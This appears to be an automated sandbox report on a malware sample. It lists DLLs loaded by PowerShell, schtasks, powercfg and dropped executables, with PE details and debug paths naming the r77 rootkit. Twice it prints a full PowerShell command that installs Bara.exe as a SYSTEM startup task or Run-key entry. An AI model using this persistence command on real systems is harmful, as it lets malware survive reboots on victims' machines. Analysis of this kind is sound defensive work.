Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Directory created: C:\Program Files\Cuis			Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Directory created: C:\Program Files\Cuis\bon			Jump to behavior

Source: 5fr5gthkjdg71.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 5fr5gthkjdg71.exe

Static file information: File size 6332216 > 1048576

Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 5fr5gthkjdg71.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 5fr5gthkjdg71.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 5fr5gthkjdg71.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: sc.exe, kaptsegthwf.exe
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 5fr5gthkjdg71.exe, 00000000.00000003.1685559832.00000209BC0DE000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp, 5fr5gthkjdg71.exe, 00000000.00000003.1684931980.00000209BB8D2000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000000.1682966370.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp

Source: 5fr5gthkjdg71.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5fr5gthkjdg71.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5fr5gthkjdg71.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5fr5gthkjdg71.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5fr5gthkjdg71.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }			Jump to behavior

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Code function: 2_2_00007FF650241B90 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

2_2_00007FF650241B90

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_4351390

Jump to behavior

Source: F4R5fd8grr.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x89a47
Source: kaptsegthwf.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x2c24bb
Source: FA9.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x5841e
Source: 5fr5gthkjdg71.exe	Static PE information: real checksum: 0x0 should be: 0x60c190
Source: Bara.exe.2.dr	Static PE information: real checksum: 0x260942 should be: 0x265c9d
Source: Client.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x89a47
Source: GR55Qg1hth.exe.0.dr	Static PE information: real checksum: 0x260942 should be: 0x265c9c
Source: gfiKDLgr58thy4d.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x2c24bb

Source: 5fr5gthkjdg71.exe	Static PE information: section name: .didat
Source: 5fr5gthkjdg71.exe	Static PE information: section name: _RDATA
Source: gfiKDLgr58thy4d.exe.0.dr	Static PE information: section name: .00cfg
Source: GR55Qg1hth.exe.0.dr	Static PE information: section name: .xdata
Source: kaptsegthwf.exe.1.dr	Static PE information: section name: .00cfg
Source: Bara.exe.2.dr	Static PE information: section name: .xdata
Source: FA9.tmp.2.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Code function: 1_2_00007FF6880C1394 push qword ptr [00007FF6880CC004h]; ret	1_2_00007FF6880C1403
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B630F7ACDD push rcx; retf 003Fh	2_2_000001B630F7ACDE
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B63117C6DD push rcx; retf 003Fh	2_2_000001B63117C6DE
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B25ACDD push rcx; retf 003Fh	10_2_1B25ACDE
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B89C6DD push rcx; retf 003Fh	10_2_1B89C6DE
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B892BF5 push eax; iretd	10_2_00007FFD9B892C4D
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B892B95 push eax; iretd	10_2_00007FFD9B892C4D
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B89CE80 push eax; ret	10_2_00007FFD9B89CEEC
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_00007FFD9B89752B push ebx; iretd	10_2_00007FFD9B89756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFD9B77D2A5 pushad ; iretd	19_2_00007FFD9B77D2A6
